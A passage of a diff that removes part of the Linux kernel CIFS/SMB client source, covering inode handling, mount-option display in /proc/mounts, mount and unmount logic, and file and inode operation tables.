+-	 * Can not set i_flags here - they get immediately overwritten to zero
+-	 * by the VFS.
+-	 */
+-	/* cifs_inode->netfs.inode.i_flags = S_NOATIME | S_NOCMTIME; */
+-	INIT_LIST_HEAD(&cifs_inode->openFileList);
+-	INIT_LIST_HEAD(&cifs_inode->llist);
+-	INIT_LIST_HEAD(&cifs_inode->deferred_closes);
+-	spin_lock_init(&cifs_inode->deferred_lock);
+-	return &cifs_inode->netfs.inode;
+-}
+-
+-static void
+-cifs_free_inode(struct inode *inode)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-
+-	if (S_ISLNK(inode->i_mode))
+-		kfree(cinode->symlink_target);
+-	kmem_cache_free(cifs_inode_cachep, cinode);
+-}
+-
+-static void
+-cifs_evict_inode(struct inode *inode)
+-{
+-	truncate_inode_pages_final(&inode->i_data);
+-	if (inode->i_state & I_PINNING_FSCACHE_WB)
+-		cifs_fscache_unuse_inode_cookie(inode, true);
+-	cifs_fscache_release_inode_cookie(inode);
+-	clear_inode(inode);
+-}
+-
+-static void
+-cifs_show_address(struct seq_file *s, struct TCP_Server_Info *server)
+-{
+-	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
+-	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
+-
+-	seq_puts(s, ",addr=");
+-
+-	switch (server->dstaddr.ss_family) {
+-	case AF_INET:
+-		seq_printf(s, "%pI4", &sa->sin_addr.s_addr);
+-		break;
+-	case AF_INET6:
+-		seq_printf(s, "%pI6", &sa6->sin6_addr.s6_addr);
+-		if (sa6->sin6_scope_id)
+-			seq_printf(s, "%%%u", sa6->sin6_scope_id);
+-		break;
+-	default:
+-		seq_puts(s, "(unknown)");
+-	}
+-	if (server->rdma)
+-		seq_puts(s, ",rdma");
+-}
+-
+-static void
+-cifs_show_security(struct seq_file *s, struct cifs_ses *ses)
+-{
+-	if (ses->sectype == Unspecified) {
+-		if (ses->user_name == NULL)
+-			seq_puts(s, ",sec=none");
+-		return;
+-	}
+-
+-	seq_puts(s, ",sec=");
+-
+-	switch (ses->sectype) {
+-	case NTLMv2:
+-		seq_puts(s, "ntlmv2");
+-		break;
+-	case Kerberos:
+-		seq_puts(s, "krb5");
+-		break;
+-	case RawNTLMSSP:
+-		seq_puts(s, "ntlmssp");
+-		break;
+-	default:
+-		/* shouldn't ever happen */
+-		seq_puts(s, "unknown");
+-		break;
+-	}
+-
+-	if (ses->sign)
+-		seq_puts(s, "i");
+-
+-	if (ses->sectype == Kerberos)
+-		seq_printf(s, ",cruid=%u",
+-			   from_kuid_munged(&init_user_ns, ses->cred_uid));
+-}
+-
+-static void
+-cifs_show_cache_flavor(struct seq_file *s, struct cifs_sb_info *cifs_sb)
+-{
+-	seq_puts(s, ",cache=");
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
+-		seq_puts(s, "strict");
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO)
+-		seq_puts(s, "none");
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
+-		seq_puts(s, "singleclient"); /* assume only one client access */
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE)
+-		seq_puts(s, "ro"); /* read only caching assumed */
+-	else
+-		seq_puts(s, "loose");
+-}
+-
+-/*
+- * cifs_show_devname() is used so we show the mount device name with correct
+- * format (e.g. forward slashes vs. back slashes) in /proc/mounts
+- */
+-static int cifs_show_devname(struct seq_file *m, struct dentry *root)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	char *devname = kstrdup(cifs_sb->ctx->source, GFP_KERNEL);
+-
+-	if (devname == NULL)
+-		seq_puts(m, "none");
+-	else {
+-		convert_delimiter(devname, '/');
+-		/* escape all spaces in share names */
+-		seq_escape(m, devname, " \t");
+-		kfree(devname);
+-	}
+-	return 0;
+-}
+-
+-/*
+- * cifs_show_options() is for displaying mount options in /proc/mounts.
+- * Not all settable options are displayed but most of the important
+- * ones are.
+- */
+-static int
+-cifs_show_options(struct seq_file *s, struct dentry *root)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct sockaddr *srcaddr;
+-	srcaddr = (struct sockaddr *)&tcon->ses->server->srcaddr;
+-
+-	seq_show_option(s, "vers", tcon->ses->server->vals->version_string);
+-	cifs_show_security(s, tcon->ses);
+-	cifs_show_cache_flavor(s, cifs_sb);
+-
+-	if (tcon->no_lease)
+-		seq_puts(s, ",nolease");
+-	if (cifs_sb->ctx->multiuser)
+-		seq_puts(s, ",multiuser");
+-	else if (tcon->ses->user_name)
+-		seq_show_option(s, "username", tcon->ses->user_name);
+-
+-	if (tcon->ses->domainName && tcon->ses->domainName[0] != 0)
+-		seq_show_option(s, "domain", tcon->ses->domainName);
+-
+-	if (srcaddr->sa_family != AF_UNSPEC) {
+-		struct sockaddr_in *saddr4;
+-		struct sockaddr_in6 *saddr6;
+-		saddr4 = (struct sockaddr_in *)srcaddr;
+-		saddr6 = (struct sockaddr_in6 *)srcaddr;
+-		if (srcaddr->sa_family == AF_INET6)
+-			seq_printf(s, ",srcaddr=%pI6c",
+-				   &saddr6->sin6_addr);
+-		else if (srcaddr->sa_family == AF_INET)
+-			seq_printf(s, ",srcaddr=%pI4",
+-				   &saddr4->sin_addr.s_addr);
+-		else
+-			seq_printf(s, ",srcaddr=BAD-AF:%i",
+-				   (int)(srcaddr->sa_family));
+-	}
+-
+-	seq_printf(s, ",uid=%u",
+-		   from_kuid_munged(&init_user_ns, cifs_sb->ctx->linux_uid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)
+-		seq_puts(s, ",forceuid");
+-	else
+-		seq_puts(s, ",noforceuid");
+-
+-	seq_printf(s, ",gid=%u",
+-		   from_kgid_munged(&init_user_ns, cifs_sb->ctx->linux_gid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)
+-		seq_puts(s, ",forcegid");
+-	else
+-		seq_puts(s, ",noforcegid");
+-
+-	cifs_show_address(s, tcon->ses->server);
+-
+-	if (!tcon->unix_ext)
+-		seq_printf(s, ",file_mode=0%ho,dir_mode=0%ho",
+-					   cifs_sb->ctx->file_mode,
+-					   cifs_sb->ctx->dir_mode);
+-	if (cifs_sb->ctx->iocharset)
+-		seq_printf(s, ",iocharset=%s", cifs_sb->ctx->iocharset);
+-	if (tcon->seal)
+-		seq_puts(s, ",seal");
+-	else if (tcon->ses->server->ignore_signature)
+-		seq_puts(s, ",signloosely");
+-	if (tcon->nocase)
+-		seq_puts(s, ",nocase");
+-	if (tcon->nodelete)
+-		seq_puts(s, ",nodelete");
+-	if (cifs_sb->ctx->no_sparse)
+-		seq_puts(s, ",nosparse");
+-	if (tcon->local_lease)
+-		seq_puts(s, ",locallease");
+-	if (tcon->retry)
+-		seq_puts(s, ",hard");
+-	else
+-		seq_puts(s, ",soft");
+-	if (tcon->use_persistent)
+-		seq_puts(s, ",persistenthandles");
+-	else if (tcon->use_resilient)
+-		seq_puts(s, ",resilienthandles");
+-	if (tcon->posix_extensions)
+-		seq_puts(s, ",posix");
+-	else if (tcon->unix_ext)
+-		seq_puts(s, ",unix");
+-	else
+-		seq_puts(s, ",nounix");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
+-		seq_puts(s, ",nodfs");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
+-		seq_puts(s, ",posixpaths");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID)
+-		seq_puts(s, ",setuids");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-		seq_puts(s, ",idsfromsid");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		seq_puts(s, ",serverino");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		seq_puts(s, ",rwpidforward");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL)
+-		seq_puts(s, ",forcemand");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-		seq_puts(s, ",nouser_xattr");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		seq_puts(s, ",mapchars");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		seq_puts(s, ",mapposix");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
+-		seq_puts(s, ",sfu");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-		seq_puts(s, ",nobrl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_HANDLE_CACHE)
+-		seq_puts(s, ",nohandlecache");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
+-		seq_puts(s, ",modefromsid");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL)
+-		seq_puts(s, ",cifsacl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-		seq_puts(s, ",dynperm");
+-	if (root->d_sb->s_flags & SB_POSIXACL)
+-		seq_puts(s, ",acl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
+-		seq_puts(s, ",mfsymlinks");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
+-		seq_puts(s, ",fsc");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)
+-		seq_puts(s, ",nostrictsync");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		seq_puts(s, ",noperm");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID)
+-		seq_printf(s, ",backupuid=%u",
+-			   from_kuid_munged(&init_user_ns,
+-					    cifs_sb->ctx->backupuid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID)
+-		seq_printf(s, ",backupgid=%u",
+-			   from_kgid_munged(&init_user_ns,
+-					    cifs_sb->ctx->backupgid));
+-
+-	seq_printf(s, ",rsize=%u", cifs_sb->ctx->rsize);
+-	seq_printf(s, ",wsize=%u", cifs_sb->ctx->wsize);
+-	seq_printf(s, ",bsize=%u", cifs_sb->ctx->bsize);
+-	if (cifs_sb->ctx->rasize)
+-		seq_printf(s, ",rasize=%u", cifs_sb->ctx->rasize);
+-	if (tcon->ses->server->min_offload)
+-		seq_printf(s, ",esize=%u", tcon->ses->server->min_offload);
+-	seq_printf(s, ",echo_interval=%lu",
+-			tcon->ses->server->echo_interval / HZ);
+-
+-	/* Only display the following if overridden on mount */
+-	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
+-		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
+-	if (tcon->ses->server->tcp_nodelay)
+-		seq_puts(s, ",tcpnodelay");
+-	if (tcon->ses->server->noautotune)
+-		seq_puts(s, ",noautotune");
+-	if (tcon->ses->server->noblocksnd)
+-		seq_puts(s, ",noblocksend");
+-
+-	if (tcon->snapshot_time)
+-		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
+-	if (tcon->handle_timeout)
+-		seq_printf(s, ",handletimeout=%u", tcon->handle_timeout);
+-
+-	/*
+-	 * Display file and directory attribute timeout in seconds.
+-	 * If file and directory attribute timeout the same then actimeo
+-	 * was likely specified on mount
+-	 */
+-	if (cifs_sb->ctx->acdirmax == cifs_sb->ctx->acregmax)
+-		seq_printf(s, ",actimeo=%lu", cifs_sb->ctx->acregmax / HZ);
+-	else {
+-		seq_printf(s, ",acdirmax=%lu", cifs_sb->ctx->acdirmax / HZ);
+-		seq_printf(s, ",acregmax=%lu", cifs_sb->ctx->acregmax / HZ);
+-	}
+-	seq_printf(s, ",closetimeo=%lu", cifs_sb->ctx->closetimeo / HZ);
+-
+-	if (tcon->ses->chan_max > 1)
+-		seq_printf(s, ",multichannel,max_channels=%zu",
+-			   tcon->ses->chan_max);
+-
+-	if (tcon->use_witness)
+-		seq_puts(s, ",witness");
+-
+-	return 0;
+-}
+-
+-static void cifs_umount_begin(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon;
+-
+-	if (cifs_sb == NULL)
+-		return;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+-		/* we have other mounts to same share or we have
+-		   already tried to umount this and woken up
+-		   all waiting network requests, nothing to do */
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-	/*
+-	 * can not set tcon->status to TID_EXITING yet since we don't know if umount -f will
+-	 * fail later (e.g. due to open files).  TID_EXITING will be set just before tdis req sent
+-	 */
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	cifs_close_all_deferred_files(tcon);
+-	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+-	/* cancel_notify_requests(tcon); */
+-	if (tcon->ses && tcon->ses->server) {
+-		cifs_dbg(FYI, "wake up tasks now - umount begin not complete\n");
+-		wake_up_all(&tcon->ses->server->request_q);
+-		wake_up_all(&tcon->ses->server->response_q);
+-		msleep(1); /* yield */
+-		/* we have to kick the requests once more */
+-		wake_up_all(&tcon->ses->server->response_q);
+-		msleep(1);
+-	}
+-
+-	return;
+-}
+-
+-static int cifs_freeze(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon;
+-
+-	if (cifs_sb == NULL)
+-		return 0;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	cifs_close_all_deferred_files(tcon);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_STATS2
+-static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+-{
+-	/* BB FIXME */
+-	return 0;
+-}
+-#endif
+-
+-static int cifs_write_inode(struct inode *inode, struct writeback_control *wbc)
+-{
+-	fscache_unpin_writeback(wbc, cifs_inode_cookie(inode));
+-	return 0;
+-}
+-
+-static int cifs_drop_inode(struct inode *inode)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	/* no serverino => unconditional eviction */
+-	return !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) ||
+-		generic_drop_inode(inode);
+-}
+-
+-static const struct super_operations cifs_super_ops = {
+-	.statfs = cifs_statfs,
+-	.alloc_inode = cifs_alloc_inode,
+-	.write_inode	= cifs_write_inode,
+-	.free_inode = cifs_free_inode,
+-	.drop_inode	= cifs_drop_inode,
+-	.evict_inode	= cifs_evict_inode,
+-/*	.show_path	= cifs_show_path, */ /* Would we ever need show path? */
+-	.show_devname   = cifs_show_devname,
+-/*	.delete_inode	= cifs_delete_inode,  */  /* Do not need above
+-	function unless later we add lazy close of inodes or unless the
+-	kernel forgets to call us with the same number of releases (closes)
+-	as opens */
+-	.show_options = cifs_show_options,
+-	.umount_begin   = cifs_umount_begin,
+-	.freeze_fs      = cifs_freeze,
+-#ifdef CONFIG_CIFS_STATS2
+-	.show_stats = cifs_show_stats,
+-#endif
+-};
+-
+-/*
+- * Get root dentry from superblock according to prefix path mount option.
+- * Return dentry with refcount + 1 on success and NULL otherwise.
+- */
+-static struct dentry *
+-cifs_get_root(struct smb3_fs_context *ctx, struct super_block *sb)
+-{
+-	struct dentry *dentry;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	char *full_path = NULL;
+-	char *s, *p;
+-	char sep;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
+-		return dget(sb->s_root);
+-
+-	full_path = cifs_build_path_to_root(ctx, cifs_sb,
+-				cifs_sb_master_tcon(cifs_sb), 0);
+-	if (full_path == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	cifs_dbg(FYI, "Get root dentry for %s\n", full_path);
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	dentry = dget(sb->s_root);
+-	s = full_path;
+-
+-	do {
+-		struct inode *dir = d_inode(dentry);
+-		struct dentry *child;
+-
+-		if (!S_ISDIR(dir->i_mode)) {
+-			dput(dentry);
+-			dentry = ERR_PTR(-ENOTDIR);
+-			break;
+-		}
+-
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		p = s++;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-
+-		child = lookup_positive_unlocked(p, dentry, s - p);
+-		dput(dentry);
+-		dentry = child;
+-	} while (!IS_ERR(dentry));
+-	kfree(full_path);
+-	return dentry;
+-}
+-
+-static int cifs_set_super(struct super_block *sb, void *data)
+-{
+-	struct cifs_mnt_data *mnt_data = data;
+-	sb->s_fs_info = mnt_data->cifs_sb;
+-	return set_anon_super(sb, NULL);
+-}
+-
+-struct dentry *
+-cifs_smb3_do_mount(struct file_system_type *fs_type,
+-	      int flags, struct smb3_fs_context *old_ctx)
+-{
+-	int rc;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb = NULL;
+-	struct cifs_mnt_data mnt_data;
+-	struct dentry *root;
+-
+-	/*
+-	 * Prints in Kernel / CIFS log the attempted mount operation
+-	 *	If CIFS_DEBUG && cifs_FYI
+-	 */
+-	if (cifsFYI)
+-		cifs_dbg(FYI, "Devname: %s flags: %d\n", old_ctx->UNC, flags);
+-	else
+-		cifs_info("Attempting to mount %s\n", old_ctx->UNC);
+-
+-	cifs_sb = kzalloc(sizeof(struct cifs_sb_info), GFP_KERNEL);
+-	if (cifs_sb == NULL) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
+-
+-	cifs_sb->ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
+-	if (!cifs_sb->ctx) {
+-		root = ERR_PTR(-ENOMEM);
+-		goto out;
+-	}
+-	rc = smb3_fs_context_dup(cifs_sb->ctx, old_ctx);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_setup_volume_info(cifs_sb->ctx, NULL, NULL);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_setup_cifs_sb(cifs_sb);
+-	if (rc) {
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	rc = cifs_mount(cifs_sb, cifs_sb->ctx);
+-	if (rc) {
+-		if (!(flags & SB_SILENT))
+-			cifs_dbg(VFS, "cifs_mount failed w/return code = %d\n",
+-				 rc);
+-		root = ERR_PTR(rc);
+-		goto out;
+-	}
+-
+-	mnt_data.ctx = cifs_sb->ctx;
+-	mnt_data.cifs_sb = cifs_sb;
+-	mnt_data.flags = flags;
+-
+-	/* BB should we make this contingent on mount parm? */
+-	flags |= SB_NODIRATIME | SB_NOATIME;
+-
+-	sb = sget(fs_type, cifs_match_super, cifs_set_super, flags, &mnt_data);
+-	if (IS_ERR(sb)) {
+-		root = ERR_CAST(sb);
+-		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-		goto out;
+-	}
+-
+-	if (sb->s_root) {
+-		cifs_dbg(FYI, "Use existing superblock\n");
+-		cifs_umount(cifs_sb);
+-		cifs_sb = NULL;
+-	} else {
+-		rc = cifs_read_super(sb);
+-		if (rc) {
+-			root = ERR_PTR(rc);
+-			goto out_super;
+-		}
+-
+-		sb->s_flags |= SB_ACTIVE;
+-	}
+-
+-	root = cifs_get_root(cifs_sb ? cifs_sb->ctx : old_ctx, sb);
+-	if (IS_ERR(root))
+-		goto out_super;
+-
+-	if (cifs_sb)
+-		cifs_sb->root = dget(root);
+-
+-	cifs_dbg(FYI, "dentry root is: %p\n", root);
+-	return root;
+-
+-out_super:
+-	deactivate_locked_super(sb);
+-	return root;
+-out:
+-	if (cifs_sb) {
+-		if (!sb || IS_ERR(sb)) {  /* otherwise kill_sb will handle */
+-			kfree(cifs_sb->prepath);
+-			smb3_cleanup_fs_context(cifs_sb->ctx);
+-			kfree(cifs_sb);
+-		}
+-	}
+-	return root;
+-}
+-
+-
+-static ssize_t
+-cifs_loose_read_iter(struct kiocb *iocb, struct iov_iter *iter)
+-{
+-	ssize_t rc;
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT)
+-		return cifs_user_readv(iocb, iter);
+-
+-	rc = cifs_revalidate_mapping(inode);
+-	if (rc)
+-		return rc;
+-
+-	return generic_file_read_iter(iocb, iter);
+-}
+-
+-static ssize_t cifs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	ssize_t written;
+-	int rc;
+-
+-	if (iocb->ki_filp->f_flags & O_DIRECT) {
+-		written = cifs_user_writev(iocb, from);
+-		if (written > 0 && CIFS_CACHE_READ(cinode)) {
+-			cifs_zap_mapping(inode);
+-			cifs_dbg(FYI,
+-				 "Set no oplock for inode=%p after a write operation\n",
+-				 inode);
+-			cinode->oplock = 0;
+-		}
+-		return written;
+-	}
+-
+-	written = cifs_get_writer(cinode);
+-	if (written)
+-		return written;
+-
+-	written = generic_file_write_iter(iocb, from);
+-
+-	if (CIFS_CACHE_WRITE(CIFS_I(inode)))
+-		goto out;
+-
+-	rc = filemap_fdatawrite(inode->i_mapping);
+-	if (rc)
+-		cifs_dbg(FYI, "cifs_file_write_iter: %d rc on %p inode\n",
+-			 rc, inode);
+-
+-out:
+-	cifs_put_writer(cinode);
+-	return written;
+-}
+-
+-static loff_t cifs_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifs_tcon *tcon;
+-
+-	/*
+-	 * whence == SEEK_END || SEEK_DATA || SEEK_HOLE => we must revalidate
+-	 * the cached file length
+-	 */
+-	if (whence != SEEK_SET && whence != SEEK_CUR) {
+-		int rc;
+-		struct inode *inode = file_inode(file);
+-
+-		/*
+-		 * We need to be sure that all dirty pages are written and the
+-		 * server has the newest file length.
+-		 */
+-		if (!CIFS_CACHE_READ(CIFS_I(inode)) && inode->i_mapping &&
+-		    inode->i_mapping->nrpages != 0) {
+-			rc = filemap_fdatawait(inode->i_mapping);
+-			if (rc) {
+-				mapping_set_error(inode->i_mapping, rc);
+-				return rc;
+-			}
+-		}
+-		/*
+-		 * Some applications poll for the file length in this strange
+-		 * way so we must seek to end on non-oplocked files by
+-		 * setting the revalidate time to zero.
+-		 */
+-		CIFS_I(inode)->time = 0;
+-
+-		rc = cifs_revalidate_file_attr(file);
+-		if (rc < 0)
+-			return (loff_t)rc;
+-	}
+-	if (cfile && cfile->tlink) {
+-		tcon = tlink_tcon(cfile->tlink);
+-		if (tcon->ses->server->ops->llseek)
+-			return tcon->ses->server->ops->llseek(file, tcon,
+-							      offset, whence);
+-	}
+-	return generic_file_llseek(file, offset, whence);
+-}
+-
+-static int
+-cifs_setlease(struct file *file, long arg, struct file_lock **lease, void **priv)
+-{
+-	/*
+-	 * Note that this is called by vfs setlease with i_lock held to
+-	 * protect *lease from going away.
+-	 */
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-
+-	if (!(S_ISREG(inode->i_mode)))
+-		return -EINVAL;
+-
+-	/* Check if file is oplocked if this is request for new lease */
+-	if (arg == F_UNLCK ||
+-	    ((arg == F_RDLCK) && CIFS_CACHE_READ(CIFS_I(inode))) ||
+-	    ((arg == F_WRLCK) && CIFS_CACHE_WRITE(CIFS_I(inode))))
+-		return generic_setlease(file, arg, lease, priv);
+-	else if (tlink_tcon(cfile->tlink)->local_lease &&
+-		 !CIFS_CACHE_READ(CIFS_I(inode)))
+-		/*
+-		 * If the server claims to support oplock on this file, then we
+-		 * still need to check oplock even if the local_lease mount
+-		 * option is set, but there are servers which do not support
+-		 * oplock for which this mount option may be useful if the user
+-		 * knows that the file won't be changed on the server by anyone
+-		 * else.
+-		 */
+-		return generic_setlease(file, arg, lease, priv);
+-	else
+-		return -EAGAIN;
+-}
+-
+-struct file_system_type cifs_fs_type = {
+-	.owner = THIS_MODULE,
+-	.name = "cifs",
+-	.init_fs_context = smb3_init_fs_context,
+-	.parameters = smb3_fs_parameters,
+-	.kill_sb = cifs_kill_sb,
+-	.fs_flags = FS_RENAME_DOES_D_MOVE,
+-};
+-MODULE_ALIAS_FS("cifs");
+-
+-struct file_system_type smb3_fs_type = {
+-	.owner = THIS_MODULE,
+-	.name = "smb3",
+-	.init_fs_context = smb3_init_fs_context,
+-	.parameters = smb3_fs_parameters,
+-	.kill_sb = cifs_kill_sb,
+-	.fs_flags = FS_RENAME_DOES_D_MOVE,
+-};
+-MODULE_ALIAS_FS("smb3");
+-MODULE_ALIAS("smb3");
+-
+-const struct inode_operations cifs_dir_inode_ops = {
+-	.create = cifs_create,
+-	.atomic_open = cifs_atomic_open,
+-	.lookup = cifs_lookup,
+-	.getattr = cifs_getattr,
+-	.unlink = cifs_unlink,
+-	.link = cifs_hardlink,
+-	.mkdir = cifs_mkdir,
+-	.rmdir = cifs_rmdir,
+-	.rename = cifs_rename2,
+-	.permission = cifs_permission,
+-	.setattr = cifs_setattr,
+-	.symlink = cifs_symlink,
+-	.mknod   = cifs_mknod,
+-	.listxattr = cifs_listxattr,
+-};
+-
+-const struct inode_operations cifs_file_inode_ops = {
+-	.setattr = cifs_setattr,
+-	.getattr = cifs_getattr,
+-	.permission = cifs_permission,
+-	.listxattr = cifs_listxattr,
+-	.fiemap = cifs_fiemap,
+-};
+-
+-const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
+-			    struct delayed_call *done)
+-{
+-	char *target_path;
+-
+-	target_path = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!target_path)
+-		return ERR_PTR(-ENOMEM);
+-
+-	spin_lock(&inode->i_lock);
+-	if (likely(CIFS_I(inode)->symlink_target)) {
+-		strscpy(target_path, CIFS_I(inode)->symlink_target, PATH_MAX);
+-	} else {
+-		kfree(target_path);
+-		target_path = ERR_PTR(-EOPNOTSUPP);
+-	}
+-	spin_unlock(&inode->i_lock);
+-
+-	if (!IS_ERR(target_path))
+-		set_delayed_call(done, kfree_link, target_path);
+-
+-	return target_path;
+-}
+-
+-const struct inode_operations cifs_symlink_inode_ops = {
+-	.get_link = cifs_get_link,
+-	.permission = cifs_permission,
+-	.listxattr = cifs_listxattr,
+-};
+-
+-static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+-		struct file *dst_file, loff_t destoff, loff_t len,
+-		unsigned int remap_flags)
+-{
+-	struct inode *src_inode = file_inode(src_file);
+-	struct inode *target_inode = file_inode(dst_file);
+-	struct cifsFileInfo *smb_file_src = src_file->private_data;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *target_tcon;
+-	unsigned int xid;
+-	int rc;
+-
+-	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "clone range\n");
+-
+-	xid = get_xid();
+-
+-	if (!src_file->private_data || !dst_file->private_data) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
+-		goto out;
+-	}
+-
+-	smb_file_target = dst_file->private_data;
+-	target_tcon = tlink_tcon(smb_file_target->tlink);
+-
+-	/*
+-	 * Note: cifs case is easier than btrfs since server responsible for
+-	 * checks for proper open modes and file type and if it wants
+-	 * server could even support copy of range where source = target
+-	 */
+-	lock_two_nondirectories(target_inode, src_inode);
+-
+-	if (len == 0)
+-		len = src_inode->i_size - off;
+-
+-	cifs_dbg(FYI, "about to flush pages\n");
+-	/* should we flush first and last page first */
+-	truncate_inode_pages_range(&target_inode->i_data, destoff,
+-				   PAGE_ALIGN(destoff + len)-1);
+-
+-	if (target_tcon->ses->server->ops->duplicate_extents)
+-		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
+-			smb_file_src, smb_file_target, off, len, destoff);
+-	else
+-		rc = -EOPNOTSUPP;
+-
+-	/* force revalidate of size and timestamps of target file now
+-	   that target is updated on the server */
+-	CIFS_I(target_inode)->time = 0;
+-	/* although unlocking in the reverse order from locking is not
+-	   strictly necessary here it is a little cleaner to be consistent */
+-	unlock_two_nondirectories(src_inode, target_inode);
+-out:
+-	free_xid(xid);
+-	return rc < 0 ? rc : len;
+-}
+-
+-ssize_t cifs_file_copychunk_range(unsigned int xid,
+-				struct file *src_file, loff_t off,
+-				struct file *dst_file, loff_t destoff,
+-				size_t len, unsigned int flags)
+-{
+-	struct inode *src_inode = file_inode(src_file);
+-	struct inode *target_inode = file_inode(dst_file);
+-	struct cifsFileInfo *smb_file_src;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *src_tcon;
+-	struct cifs_tcon *target_tcon;
+-	ssize_t rc;
+-
+-	cifs_dbg(FYI, "copychunk range\n");
+-
+-	if (!src_file->private_data || !dst_file->private_data) {
+-		rc = -EBADF;
+-		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
